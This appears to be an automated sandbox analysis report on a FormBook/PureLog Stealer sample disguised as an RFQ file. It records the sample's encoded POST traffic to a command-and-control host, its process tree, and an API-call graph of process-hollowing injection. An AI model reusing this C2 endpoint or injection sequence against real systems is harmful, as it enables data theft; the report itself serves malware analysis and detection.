                            May 14, 2024 12:53:45.362076044 CEST1289INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 66 2d 63 62 72 20 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 72 65 6c 3d 22 6e 6f
                            Data Ascii: > <span class="sf-cbr link"> <a href="#" rel="nofollow">Cookies</a></span> </div> <div class="s-f-l-c-w"> <div class="s-f-lang l
                            May 14, 2024 12:53:45.362091064 CEST1289INData Raw: 34 20 36 2e 37 30 37 2d 36 2e 31 32 36 20 36 2e 37 30 37 2d 32 2e 37 39 32 20 30 2d 36 2e 30 39 2d 31 2e 31 36 2d 36 2e 30 39 2d 36 2e 37 30 37 53 36 33 2e 31 20 35 2e 36 35 20 36 35 2e 38 39 33 20 35 2e 36 35 73 36 2e 31 32 37 20 31 2e 31 36 20
                            Data Ascii: 4 6.707-6.126 6.707-2.792 0-6.09-1.16-6.09-6.707S63.1 5.65 65.893 5.65s6.127 1.16 6.127 6.707zm-1.848 0c0-3.48-1.27-5.004-4.242-5.004-2.936 0-4.205 1.523-4.205 5.004 0 3.48 1.27 5.003 4.205 5.003 2.937 0 4.242-1.523 4.242-5.003zM25.362 5.65c-5
                            May 14, 2024 12:53:45.681056976 CEST1289INData Raw: 30 20 2e 39 30 36 2e 30 33 36 20 31 2e 33 34 2e 31 30 38 56 35 2e 37 32 32 63 2d 2e 34 33 34 2d 2e 30 37 33 2d 2e 38 37 2d 2e 31 31 2d 31 2e 33 34 2d 2e 31 31 2d 32 2e 37 32 20 30 2d 35 2e 39 34 36 20 31 2e 31 36 2d 35 2e 39 34 36 20 36 2e 35 36
                            Data Ascii: 0 .906.036 1.34.108V5.722c-.434-.073-.87-.11-1.34-.11-2.72 0-5.946 1.16-5.946 6.563 0 5.982 3.59 6.89 5.728 6.89 4.93 0 5.294-3.155 5.294-4.098V.9h-1.886z" fill="#FFF"></path> </svg> </span> </a></div></div><sectio


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.104975291.195.240.19803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:54:00.143940926 CEST724OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.solesense.pro
                            Origin: http://www.solesense.pro
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 191
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.solesense.pro/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 68 4d 36 50 69 42 77 36 4c 49 71 57 48 6e 55 36 70 51 75 61 68 4a 4b 33 42 49 46 6a 77 77 41 56 72 72 72 52 49 2b 6b 71 66 6e 75 63 36 51 76 51 4b 58 4e 43 67 54 4b 70 70 69 53 47 75 45 39 4e 6c 36 61 72 46 55 47 55 53 45 51 52 52 65 4e 4f 54 54 63 77 62 39 37 4f 78 6a 6b 77 62 39 7a 41 74 58 6f 50 71 59 63 66 51 70 79 67 4d 58 62 31 70 77 69 54 57 50 55 57 71 67 46 61 75 4f 33 52 78 6a 31 34 6a 4a 38 62 2b 32 39 38 54 61 31 59 36 58 75 64 6d 51 4a 70 45 38 72 46 35 58 6c 4f 75 49 74 49 38 7a 78 74 78 4e 72 70 62 65 6c 2b
                            Data Ascii: Fb=IuMe+iFtDZEnhM6PiBw6LIqWHnU6pQuahJK3BIFjwwAVrrrRI+kqfnuc6QvQKXNCgTKppiSGuE9Nl6arFUGUSEQRReNOTTcwb97Oxjkwb9zAtXoPqYcfQpygMXb1pwiTWPUWqgFauO3Rxj14jJ8b+298Ta1Y6XudmQJpE8rF5XlOuItI8zxtxNrpbel+
                            May 14, 2024 12:54:00.449212074 CEST208INHTTP/1.1 403 Forbidden
                            content-length: 93
                            cache-control: no-cache
                            content-type: text/html
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.104975391.195.240.19803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:54:02.974143028 CEST748OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.solesense.pro
                            Origin: http://www.solesense.pro
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 215
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.solesense.pro/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 7a 38 4b 50 68 68 4d 36 61 34 71 56 43 6e 55 36 77 41 75 65 68 4a 47 33 42 4a 42 7a 77 44 6b 56 71 4c 37 52 4a 36 51 71 4b 6e 75 63 79 77 75 62 55 6e 4e 4a 67 54 47 62 70 6a 2b 47 75 48 42 4e 6c 36 4b 72 47 6a 71 58 53 55 51 54 61 2b 4e 4d 65 7a 63 77 62 39 37 4f 78 6e 49 61 62 39 62 41 74 47 34 50 6f 39 6f 59 64 4a 79 68 4c 58 62 31 34 41 69 58 57 50 55 6b 71 69 67 50 75 4e 50 52 78 6d 52 34 74 39 6f 55 6c 47 39 36 64 36 30 58 30 45 54 2f 6a 43 4a 4f 45 66 7a 56 75 56 70 30 6b 4a 4d 50 74 69 51 36 69 36 33 6e 56 59 51 55 37 4b 66 45 6a 47 74 55 6d 70 54 32 6e 69 6d 52 50 58 63 31 33 41 3d 3d
                            Data Ascii: Fb=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDkVqL7RJ6QqKnucywubUnNJgTGbpj+GuHBNl6KrGjqXSUQTa+NMezcwb97OxnIab9bAtG4Po9oYdJyhLXb14AiXWPUkqigPuNPRxmR4t9oUlG96d60X0ET/jCJOEfzVuVp0kJMPtiQ6i63nVYQU7KfEjGtUmpT2nimRPXc13A==
                            May 14, 2024 12:54:03.279397964 CEST208INHTTP/1.1 403 Forbidden
                            content-length: 93
                            cache-control: no-cache
                            content-type: text/html
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.104975491.195.240.19803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:54:05.803603888 CEST1761OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.solesense.pro
                            Origin: http://www.solesense.pro
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 1227
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.solesense.pro/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 7a 38 4b 50 68 68 4d 36 61 34 71 56 43 6e 55 36 77 41 75 65 68 4a 47 33 42 4a 42 7a 77 44 73 56 72 34 44 52 49 64 4d 71 4d 58 75 63 75 67 75 59 55 6e 4e 75 67 54 65 66 70 6a 43 73 75 42 4e 4e 33 4d 47 72 52 69 71 58 59 55 51 54 48 75 4e 50 54 54 64 6f 62 39 4c 4b 78 6a 6f 61 62 39 62 41 74 46 77 50 68 49 63 59 4f 5a 79 67 4d 58 62 48 70 77 6a 43 57 4c 34 30 71 69 6c 30 75 38 76 52 79 47 42 34 67 6f 38 55 70 47 39 34 4e 71 31 49 30 45 66 4a 6a 43 46 43 45 63 76 2f 75 58 35 30 6b 4f 6f 54 32 68 68 74 32 38 54 44 65 4f 42 79 35 4d 62 7a 74 33 67 43 73 4d 44 75 6c 6a 58 4e 43 33 5a 2b 71 77 6d 79 7a 34 43 50 50 59 42 4a 7a 74 74 63 59 46 49 67 31 79 76 47 4f 73 63 48 32 69 75 66 37 53 4e 37 38 5a 66 64 62 79 77 4c 70 41 6c 73 39 57 44 6e 62 76 4f 36 70 45 36 41 52 78 79 6c 33 4d 31 6c 4b 6d 43 43 2b 64 6b 52 38 51 4e 34 5a 47 64 52 39 55 58 30 52 32 5a 41 4a 78 31 59 52 69 51 62 56 59 46 4f 34 41 4c 41 67 78 6d 4c 77 41 50 44 7a 61 31 31 55 51 76 6a 72 51 68 [TRUNCATED]
                            Data Ascii: Fb=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDsVr4DRIdMqMXucuguYUnNugTefpjCsuBNN3MGrRiqXYUQTHuNPTTdob9LKxjoab9bAtFwPhIcYOZygMXbHpwjCWL40qil0u8vRyGB4go8UpG94Nq1I0EfJjCFCEcv/uX50kOoT2hht28TDeOBy5Mbzt3gCsMDuljXNC3Z+qwmyz4CPPYBJzttcYFIg1yvGOscH2iuf7SN78ZfdbywLpAls9WDnbvO6pE6ARxyl3M1lKmCC+dkR8QN4ZGdR9UX0R2ZAJx1YRiQbVYFO4ALAgxmLwAPDza11UQvjrQhew2Gp5hPmy6NXDsKDyMpno8+y9wmKI5XUf5iV6Cpw3OulmQvpvYgWL3IvCLl1YEp5dZtxGhsqkjilxR4KCtWfYGb0/pxoYjKuBw5DwL7dlaIB1W4MGG1P9dR8Uentz8TEG+Ue1mKG+/xukWTtQDWLlupYmMDIWI66PemxKGnuQj+kA5xxtmbDnwGBXJ1HHF7wvHznwllXnxvCoLOkdor0hIwXyZQsyqWccTnPi/ZzZH+70W2kz0VrMaQtyLTNCzn/4UlTOumfFozfnexsMjfIhg48LFwE3ecLFa6Pdg14nrl4J61l0P4tri3Qs0Ggs8mCFnn1KN8Eb0RlP8ZLqbGpKKbrJVEXoLF4PmLKeEzaui54LdMifLrNK+CBtxC4/LJQS/7cNi0VWveeYod/RM3DqD3h2USCx2VWPPD/OXA5Em5PJSdEfo+n+QsiRGjLP1Mzh1xlfbn0OOZjidqv9hBUCRpnhBeQR3W+ngUuzVLIIHELiYpxBRjsH5YykEVDsOBS1RHnKJZ7visUV9Z/N25/jf9v1+o3MTeLO//W1iBtpk5c80cf4vg5MILeNnR69IxbO55N0ITdvMDPUSCLGWBkmQJ44zVyUds3vDWZr55z2+wX2vVRn8CQYLGyhLzSztA5u+WWLQovEeanRZpmdMxJ/tsaIw7AZObvr [TRUNCATED]
                            May 14, 2024 12:54:06.108787060 CEST208INHTTP/1.1 403 Forbidden
                            content-length: 93
                            cache-control: no-cache
                            content-type: text/html
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.104975591.195.240.19803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:54:08.648319006 CEST463OUTGET /aleu/?Fb=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUE3Q4RMAOFSo2a4DyoUA+b+KE1mcO3A==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.solesense.pro
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:54:08.956393957 CEST208INHTTP/1.1 403 Forbidden
                            content-length: 93
                            cache-control: no-cache
                            content-type: text/html
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:12:50:13
                            Start date:14/05/2024
                            Path:C:\Users\user\Desktop\RFQ-25251.scr.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\RFQ-25251.scr.exe"
                            Imagebase:0xdd0000
                            File size:783'880 bytes
                            MD5 hash:46C4B29EC6111CEBFA1BBD60074C3103
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1289692109.00000000078D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1286766644.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:5
                            Start time:12:50:16
                            Start date:14/05/2024
                            Path:C:\Users\user\Desktop\RFQ-25251.scr.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\RFQ-25251.scr.exe"
                            Imagebase:0x1c0000
                            File size:783'880 bytes
                            MD5 hash:46C4B29EC6111CEBFA1BBD60074C3103
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:6
                            Start time:12:50:16
                            Start date:14/05/2024
                            Path:C:\Users\user\Desktop\RFQ-25251.scr.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\RFQ-25251.scr.exe"
                            Imagebase:0x100000
                            File size:783'880 bytes
                            MD5 hash:46C4B29EC6111CEBFA1BBD60074C3103
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:7
                            Start time:12:50:16
                            Start date:14/05/2024
                            Path:C:\Users\user\Desktop\RFQ-25251.scr.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\RFQ-25251.scr.exe"
                            Imagebase:0x7a0000
                            File size:783'880 bytes
                            MD5 hash:46C4B29EC6111CEBFA1BBD60074C3103
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:14
                            Start time:12:50:37
                            Start date:14/05/2024
                            Path:C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe"
                            Imagebase:0x1000000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:15
                            Start time:12:50:39
                            Start date:14/05/2024
                            Path:C:\Windows\SysWOW64\replace.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\replace.exe"
                            Imagebase:0x940000
                            File size:18'944 bytes
                            MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:false

                            General

                            Target ID:16
                            Start time:12:50:52
                            Start date:14/05/2024
                            Path:C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe"
                            Imagebase:0x1000000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:18
                            Start time:12:51:04
                            Start date:14/05/2024
                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                            Imagebase:0x7ff613480000
                            File size:676'768 bytes
                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.9%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:185
                              Total number of Limit Nodes:19
                              execution_graph 29872 810c850 29873 810c9db 29872->29873 29875 810c876 29872->29875 29875->29873 29876 810c1c4 29875->29876 29877 810cad0 PostMessageW 29876->29877 29878 810cb3c 29877->29878 29878->29875 29879 810dd10 FindCloseChangeNotification 29880 810dd77 29879->29880 30047 15dd4c8 DuplicateHandle 30048 15dd55e 30047->30048 30091 15d4668 30092 15d4672 30091->30092 30094 15d4759 30091->30094 30095 15d477d 30094->30095 30099 15d4859 30095->30099 30103 15d4868 30095->30103 30101 15d4868 30099->30101 30100 15d496c 30100->30100 30101->30100 30107 15d44d4 30101->30107 30105 15d488f 30103->30105 30104 15d496c 30104->30104 30105->30104 30106 15d44d4 CreateActCtxA 30105->30106 30106->30104 30108 15d58f8 CreateActCtxA 30107->30108 30110 15d59bb 30108->30110 30110->30110 29881 810aadb 29882 810aae2 29881->29882 29883 810aa88 29881->29883 29883->29882 29887 810b070 29883->29887 29901 810b0de 29883->29901 29916 810b080 29883->29916 29888 810b080 29887->29888 29889 810b0be 29888->29889 29930 810b661 29888->29930 29935 810bc6d 29888->29935 29941 810b6eb 29888->29941 29945 810b60a 29888->29945 29953 810b479 29888->29953 29958 810b8a8 29888->29958 29963 810b806 29888->29963 29971 810b7c5 29888->29971 29976 810b8f3 29888->29976 29981 810bbc2 29888->29981 29985 810b732 29888->29985 29889->29883 29902 810b06c 29901->29902 29904 810b0e1 29901->29904 29903 810b0be 29902->29903 29905 810b661 2 API calls 29902->29905 29906 810b732 2 API calls 29902->29906 29907 810bbc2 2 API calls 29902->29907 29908 810b8f3 2 API calls 29902->29908 29909 810b7c5 2 API calls 29902->29909 29910 810b806 4 API calls 29902->29910 29911 810b8a8 2 API calls 29902->29911 29912 810b479 2 API calls 29902->29912 29913 810b60a 4 API calls 29902->29913 29914 810b6eb 2 API calls 29902->29914 29915 810bc6d 2 API calls 29902->29915 29903->29883 29904->29883 29905->29903 29906->29903 29907->29903 29908->29903 29909->29903 29910->29903 29911->29903 29912->29903 29913->29903 29914->29903 29915->29903 29917 810b09a 29916->29917 29918 810b0be 29917->29918 29919 810b661 2 API calls 29917->29919 29920 810b732 2 API calls 29917->29920 29921 810bbc2 2 API calls 29917->29921 29922 810b8f3 2 API calls 29917->29922 29923 810b7c5 2 API calls 29917->29923 29924 810b806 4 API calls 29917->29924 29925 810b8a8 2 API calls 29917->29925 29926 810b479 2 API calls 29917->29926 29927 810b60a 4 API calls 29917->29927 29928 810b6eb 2 API calls 29917->29928 29929 810bc6d 2 API calls 29917->29929 29918->29883 29919->29918 29920->29918 29921->29918 29922->29918 29923->29918 29924->29918 29925->29918 29926->29918 29927->29918 29928->29918 29929->29918 29931 810b5af 29930->29931 29989 8109ab0 29931->29989 29993 8109ab8 29931->29993 29932 810bb9a 29936 810b925 29935->29936 29937 810bc7a 29935->29937 29997 8109b71 29936->29997 30001 8109b78 29936->30001 29938 810b946 30005 81099e0 29941->30005 30009 81099d8 29941->30009 29942 810b70a 29946 810b60e 29945->29946 30013 810c677 29946->30013 30018 810c688 29946->30018 29947 810b627 29948 810b597 29947->29948 30023 8109930 29947->30023 30027 8109929 29947->30027 29948->29889 29954 810b4a8 29953->29954 30031 810a238 29954->30031 30035 810a22c 29954->30035 29959 810b8ae 29958->29959 29960 810b597 29959->29960 29961 8109930 ResumeThread 29959->29961 29962 8109929 ResumeThread 29959->29962 29960->29889 29961->29959 29962->29959 29964 810b60e 29963->29964 29965 810b597 29963->29965 29969 810c677 2 API calls 29964->29969 29970 810c688 2 API calls 29964->29970 29965->29889 29966 810b627 29966->29965 29967 8109930 ResumeThread 29966->29967 29968 8109929 ResumeThread 29966->29968 29967->29966 29968->29966 29969->29966 29970->29966 30039 810a0a0 29971->30039 30043 810a09b 29971->30043 29972 810b6af 29972->29971 29973 810bb63 29972->29973 29973->29889 29977 810b8f9 29976->29977 29979 8109b71 WriteProcessMemory 29977->29979 29980 8109b78 WriteProcessMemory 29977->29980 29978 810b946 29979->29978 29980->29978 29983 8109b71 WriteProcessMemory 29981->29983 29984 8109b78 WriteProcessMemory 29981->29984 29982 810b5e4 29983->29982 29984->29982 29987 8109b71 WriteProcessMemory 29985->29987 29988 8109b78 WriteProcessMemory 29985->29988 29986 810b764 29986->29889 29987->29986 29988->29986 29990 8109ab8 VirtualAllocEx 29989->29990 29992 8109b35 29990->29992 29992->29932 29994 8109af8 VirtualAllocEx 29993->29994 29996 8109b35 29994->29996 29996->29932 29998 8109b78 WriteProcessMemory 29997->29998 30000 8109c17 29998->30000 30000->29938 30002 8109bc0 WriteProcessMemory 30001->30002 30004 8109c17 30002->30004 30004->29938 30006 8109a25 Wow64SetThreadContext 30005->30006 30008 8109a6d 30006->30008 30008->29942 30010 8109a48 Wow64SetThreadContext 30009->30010 30012 81099de 30009->30012 30011 8109a6d 30010->30011 30011->29942 30012->30010 30014 810c688 30013->30014 30016 81099e0 Wow64SetThreadContext 30014->30016 30017 81099d8 Wow64SetThreadContext 30014->30017 30015 810c6b3 30015->29947 30016->30015 30017->30015 30019 810c69d 30018->30019 30021 81099e0 Wow64SetThreadContext 30019->30021 30022 81099d8 Wow64SetThreadContext 30019->30022 30020 810c6b3 30020->29947 30021->30020 30022->30020 30024 8109970 ResumeThread 30023->30024 30026 81099a1 30024->30026 30026->29947 30028 8109970 ResumeThread 30027->30028 30030 81099a1 30028->30030 30030->29947 30032 810a2c1 CreateProcessA 30031->30032 30034 810a483 30032->30034 30034->30034 30036 810a2c1 CreateProcessA 30035->30036 30038 810a483 30036->30038 30038->30038 30040 810a0eb ReadProcessMemory 30039->30040 30042 810a12f 30040->30042 30042->29972 30044 810a0eb ReadProcessMemory 30043->30044 30046 810a12f 30044->30046 30046->29972 30049 15dd280 30050 15dd2c6 GetCurrentProcess 30049->30050 30052 15dd318 GetCurrentThread 30050->30052 30053 15dd311 30050->30053 30054 15dd34e 30052->30054 30055 15dd355 GetCurrentProcess 30052->30055 30053->30052 30054->30055 30058 15dd38b 30055->30058 30056 15dd3b3 GetCurrentThreadId 30057 15dd3e4 30056->30057 30058->30056 30059 15daef0 30063 15dafd9 30059->30063 30071 15dafe8 30059->30071 30060 15daeff 30064 15daff9 30063->30064 30065 15db01c 30063->30065 30064->30065 30079 15db271 30064->30079 30083 15db280 30064->30083 30065->30060 30066 15db014 30066->30065 30067 15db220 GetModuleHandleW 30066->30067 30068 15db24d 30067->30068 30068->30060 30072 15daff9 30071->30072 30073 15db01c 30071->30073 30072->30073 30077 15db271 LoadLibraryExW 30072->30077 30078 15db280 LoadLibraryExW 30072->30078 30073->30060 30074 15db014 30074->30073 30075 15db220 GetModuleHandleW 30074->30075 30076 15db24d 30075->30076 30076->30060 30077->30074 30078->30074 30080 15db280 30079->30080 30082 15db2b9 30080->30082 30087 15dacf8 30080->30087 30082->30066 30084 15db294 30083->30084 30085 15db2b9 30084->30085 30086 15dacf8 LoadLibraryExW 30084->30086 30085->30066 30086->30085 30088 15db460 LoadLibraryExW 30087->30088 30090 15db4d9 